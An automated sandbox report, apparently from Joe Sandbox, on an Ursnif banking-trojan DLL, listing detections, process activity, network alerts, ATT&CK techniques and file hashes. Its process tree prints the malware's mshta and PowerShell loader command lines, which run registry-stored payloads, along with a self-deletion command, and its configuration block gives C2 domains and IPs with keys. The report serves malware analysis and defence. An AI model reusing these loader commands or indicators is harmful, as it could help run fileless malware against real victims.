Windows
Analysis Report
lokvQRcUe0
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 6352 cmdline: loaddll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
  - cmd.exe (PID: 6360 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
  - rundll32.exe (PID: 6380 cmdline: rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  - control.exe (PID: 2388 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  - WerFault.exe (PID: 6440 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 272 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  - WerFault.exe (PID: 6616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 396 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  - WerFault.exe (PID: 6836 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 424 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- mshta.exe (PID: 6356 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kxac='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kxac).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  - powershell.exe (PID: 6564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
  - conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - csc.exe (PID: 7044 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5khtopv.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  - cvtres.exe (PID: 7020 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE691.tmp" "c:\Users\user\AppData\Local\Temp\CSC7CF5F35C720441118B71E863AB44B87A.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  - csc.exe (PID: 6644 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kikzslfg.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  - cvtres.exe (PID: 4600 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE5F.tmp" "c:\Users\user\AppData\Local\Temp\CSC72CD5E3A7BFC47C08453C5B847B47E88.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  - explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  - cmd.exe (PID: 5580 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lokvQRcUe0.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  - conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cleanup
{"RSA Public Key": "WNd6IZBAE2hic5I1vBvTbN5vraX26aprGyHDrt/+eglFMVKwHFISXmgegfDVQ9JN9IUBekU+LfpLvYZv7zcwNdRn5M8aw4eWI4bhXGfXhg2rVYeSiUnG1MC8lOzPSzU/SYBFMQ3nL+vB66ov2XPPmoP4rSDS0CC6n6OlCY+w5hwtLwivxH53vqcLh3WTh2ZNXxBC6Zc4STr3Ek0KlqqVtSr6/5fGwBuo8VUIBdXBWxDjxcGYyua+/PQsbUFFnwV7HET72C1unl+X1RemGW2bFwrlyX4Q85gTacSXgMufXChh3wAcaiq0qhw5JwdEPrdIO+t+/C9wfw4K/YIRIDiXpoorOLszNh6osFoQvZIrAl8=", "c2_domain": ["cabrioxmdes.at", "gamexperts.net", "37.10.71.138", "185.158.250.51"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
No Sigma rule has matched
Timestamp: | 192.168.2.313.107.42.1649743802033203 05/26/22-04:06:31.790854 |
SID: | 2033203 |
Source Port: | 49743 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.3176.10.119.6849752802033204 05/26/22-04:06:53.058632 |
SID: | 2033204 |
Source Port: | 49752 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.3176.10.119.6849752802033203 05/26/22-04:06:53.058632 |
SID: | 2033203 |
Source Port: | 49752 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 2_2_04A15FBB |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_04F665C2 | |
Source: | Code function: | 2_2_04F699BC | |
Source: | Code function: | 2_2_04F7BAD1 |
Source: | Code function: | 2_2_04F6FD47 |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 2_2_04A11CA5 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | Registry key value created / modified: |
Source: | Code function: | 2_2_04A15FBB |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Code function: | 2_2_04A168BD |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_04A17EA9 | |
Source: | Code function: | 2_2_04A1829B | |
Source: | Code function: | 2_2_04F63496 | |
Source: | Code function: | 2_2_04F83DAF | |
Source: | Code function: | 2_2_04F838A9 | |
Source: | Code function: | 34_2_00DC4493 |
Source: | Static PE information: |
Source: | Code function: | 2_2_04F6EC00 |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Process information set: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: |
Source: | Evasive API call chain: |
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 2_2_04F665C2 | |
Source: | Code function: | 2_2_04F699BC | |
Source: | Code function: | 2_2_04F7BAD1 |
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 2_2_04F6FD47 |
Source: | Binary or memory string: | ||
Source: | Code function: | 2_2_04F6EC00 |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_04F68FEC |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: |
Source: | Section loaded: |
Source: | Memory written: |
Source: | Memory protected: |
Source: | Memory allocated: |
Source: | Memory written: |
Source: | Thread register set: |
Source: | Thread created: |
Source: | Process created: |
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Queries volume information: |
Source: | Code function: | 2_2_04A13365 |
Source: | Key value queried: |
Source: | Code function: | 2_2_04F781F1 |
Source: | Code function: | 2_2_04A176BB |
Source: | Code function: | 2_2_04A16D78 |
Source: | Code function: | 2_2_04A13365 |
Stealing of Sensitive Information |
---|
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 813 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 11 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 813 Process Injection | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 Remote System Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
49% | ReversingLabs | Win32.Trojan.Lazy | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira URL Cloud | phishing | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | phishing | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | phishing | ||
100% | Avira URL Cloud | phishing | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | phishing |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| true | | unknown |
| true | | unknown |
| true | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | true | | unknown |
| | false | | low |
| | false | | unknown |
| | true | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | true | | unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
176.10.119.68 | unknown | Switzerland | | 51395 | AS-SOFTPLUSCH | true |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 634419 |
Start date and time: | 2022-05-26 04:05:06 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 13m 20s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | lokvQRcUe0 (renamed file extension from none to dll) |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of new started processes analysed: | 45 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 1 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@27/28@0/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
- Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.107.42.16
- Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6356 because there are no executed functions
- Not all processes were analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
04:06:17 | API Interceptor | |
04:07:05 | API Interceptor | |
04:07:51 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
176.10.119.68 | | | malicious | | |
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-SOFTPLUSCH | | | malicious | | |
⊘No context
⊘No context
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_13ec5c98984773435626ad7d5b7558cb4938ccf_7cac0383_19b2f365\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.7489367348203112 |
Encrypted: | false |
SSDEEP: | 96:DvF+1InYyGy9haot7JnOpXIQcQac6pcEccw35+a+z+HbHgoownOgtYsXqOEX/vF1:jdn+H0tGtjbq/u7sLS274ItW |
MD5: | D5E7A810266C0360B05ABAA90325D05D |
SHA1: | 26D18F5B23A1A41BED2465ED47F56D889D45010F |
SHA-256: | BD534CC31EF9CC02A34C0181EE7BD9C6DC12CB6CE93A0A113FF1B837950BCE1B |
SHA-512: | EEE5A73BD400EC913B2C795B18CD7D0DB001FCE986F0B8C20455D0A99BA83FC9137FFAC403B6B063388B7C576564F01707119E683E18C8BC91A6ADEA07A5B9B0 |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_b0f1b17d9a16ab43633fff1f39c444c106187da_7cac0383_1942e1c1\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.7418279470653837 |
Encrypted: | false |
SSDEEP: | 96:+ClInYyPy9haVCj+ASZpXIQcQac6pcEccw35+a+z+HbHgoownOgtYsXqOEX/vFOp:ynVH0tGtjbq/u7sLS274Itb |
MD5: | 3C1FCD749BF12D3B7F2A8EEBF75E74B3 |
SHA1: | 1B8F8C88D17B723C18848FBDDE88947D746E5879 |
SHA-256: | DFC470A575DB0CDD9697D1DBA1B935F0B4B0B5B9E565CE181A8171F29C9CC9BC |
SHA-512: | 3B12A45EDCE87B8CF0834DA52756F7A21C280F08E135ED51BE58F29040C3D05EED9C31A680A2611CD8866C20AADC8C5DEDD1FBB1DD5D4662B1C37D1633E2F64B |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_ffc671f5cc13577c9afdbbe1a48667719c593ee_7cac0383_1adf0343\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.7452135127368718 |
Encrypted: | false |
SSDEEP: | 96:aFTFydZInYyGy9haVCjmfspXIQcQl8c6npbcE7cw3C+a+z+HbHgoownOgtYsXqO1:apganTH78tbBEjbq/u7swS274ItW |
MD5: | 4676BB18681C3F440D8E111849E76E52 |
SHA1: | D3D4935FA6C9E4F4C734124509543F11E309B318 |
SHA-256: | C95EA7E8ED353FA50E442995B539984CFFC545E9A213680B0343DA40A3656D83 |
SHA-512: | 7A07D8AF9ADA4514A82A60D29ED48744503049C4BB4648BE24941D5E2DCFFB5F332355BB901E9CE1A3FA3297B6FBA67FB9CA5311AACE78F14B1B3AD66571C90D |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 37522 |
Entropy (8bit): | 1.952483435461223 |
Encrypted: | false |
SSDEEP: | 96:5J8oq8M/2+Nz+Poi7SfCBFRME2SBaMVIabT5duzDAKqBTsFWInWIBgI4jJTGRc8V:wf2+NZOSFWxphdumXjdGRc8U0fOz |
MD5: | 07ABE710E329FCA3C299AFAD1AE79C0E |
SHA1: | 10361EDE3FF7B9E104006CC3F462F6D6EAA30AF1 |
SHA-256: | 1EB35B201DEFCE33CCF6F97DDBABB1756743AAED90DA40913BE6F739B34722E4 |
SHA-512: | BD31BDEA614708437CDB80ED706EAAE231110A2030F24E1136D42727E4743EC6450C7C6ECF0386EF9F19F0298B2924E3B555C1A0AD725F9CAD4AC6AE7B77A181 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8346 |
Entropy (8bit): | 3.6923276777881933 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNiA+6bfucF6YWVSUqF8gmfbSt9CpNj89bEO1fyMm:RrlsNi56aW6YkSUqF8gmfbSFEEf4 |
MD5: | 32B1D05D43DA3F9AAD3868BEEB87391A |
SHA1: | 3C98CEA62445036A6FC570DFC3BEDCAFE965367D |
SHA-256: | 5D5FFC18AD55E5082682182FC83ABA21FA70577698258F54337209AA203600D2 |
SHA-512: | 9268517336F84A7FA1E3AF9DD6831D83A64A05E62B94D670640D5A3FEA8F4A3E4AA33F294590858D5C1B9F48157BCC595B5EAB4524BD215A73088D3D9ED3FAEE |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4659 |
Entropy (8bit): | 4.424687359057914 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsuJgtWI9CcWgc8sqYjy8fm8M4J2+4FA+q8vQ+WKcQIcQw0ld:uITfkFVgrsqYjJzKKKkw0ld |
MD5: | 13514E4971D5EAF338B2584EC9131379 |
SHA1: | 7BA320D9BB21969CAFB4DFCC418DBE16A4D2171A |
SHA-256: | 5C78050C06F40345D01FE32AFBD71A7573387E87632E16BB9D2402CE82FEEE79 |
SHA-512: | 8A6FAB012137E08868815004F5014C98C09AF4C60A27C711EA46CF08E1C6B211A63C0AF340D16900270A2D808F4C5EC84B06BEFE2B513B0CFDDC33997C60582C |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 37322 |
Entropy (8bit): | 1.8947302696079928 |
Encrypted: | false |
SSDEEP: | 96:5C8oi8M/G+5l/1oi7SfCgFR2iBCMelJ5t4uzDAKqBTsFWInWIBgI4jJT9p3LqWct:j3G+DCOSvClPaumXjd9p7qWcODKiPfpY |
MD5: | 2BF1A1E91B53E5CD417B1E9239325FD8 |
SHA1: | 48135C24AEF60723F4DA16198D7BC2F8E96B073C |
SHA-256: | 8052C42F618E22A1BEBBD651DCEB232C60F478491F597D2B80F71A408737CAE7 |
SHA-512: | 453D84AA1DBA1BBDD396516840E3BBC69E69BFB097F5E4802A5A662D8D59F7153190E362D7210C8903A7BD283AF85B02378AD5A37E1163AB62EDF07B2A6F3ED5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8334 |
Entropy (8bit): | 3.702395314492602 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNiAL6bf606YWSSUonwgmffSt9Cpru89bbmsfApm:RrlsNi86O06YjSUonwgmffSQbFfT |
MD5: | 77967BF18A4A34A14AC3777AA82FD989 |
SHA1: | BF228D629051EE5147FB5CCF51AEF9D049A24040 |
SHA-256: | 23DBFD3DEE2D8567F2FFE2A7C4507AC4E7AF590D58BD6E557EBD77F2FB4018D2 |
SHA-512: | 14C636839BA38A23A370599C9FCC4587C8F8E4365C9D6314CDB89AEFEC069FBD1AA489102FA05167529ED84CE21F24DDC4D2565F2BE0F1A64907E62AAEE8D7DD |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4598 |
Entropy (8bit): | 4.47471576307433 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsuJgtWI9CcWgc8sqYje8fm8M4J2+cZFe+q849BrKcQIcQw0kd:uITfkFVgrsqY3J+C3rKkw0kd |
MD5: | 54C03D70B220D32B86E7ADD1E89E9F2E |
SHA1: | E689CB03167A07E8B6B3A9BBA353FBD971149EEE |
SHA-256: | B1E454C2508E67F574BC23B5F9C278333276492C342872A87AC6A55C2E2D96AF |
SHA-512: | 6919BC738AB85FE52B1E95CF19ADB11A70FB1867370D553985F57653CF7F9FB32FFF3A77EEEB8B0E52F327C2F65AFBFC5D22CB159CF19F490F9E8AFA0880B644 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 50326 |
Entropy (8bit): | 2.125946543056507 |
Encrypted: | false |
SSDEEP: | 192:IpH+L4OSAmpgaeTlcrl76oH72ElMckKTA4squIZjdC5PIKHDDEAKkPsy:h/SAmpgaeE5lMckCyquI505Psy |
MD5: | CA250C408A43688CEFB9F3397FA729EB |
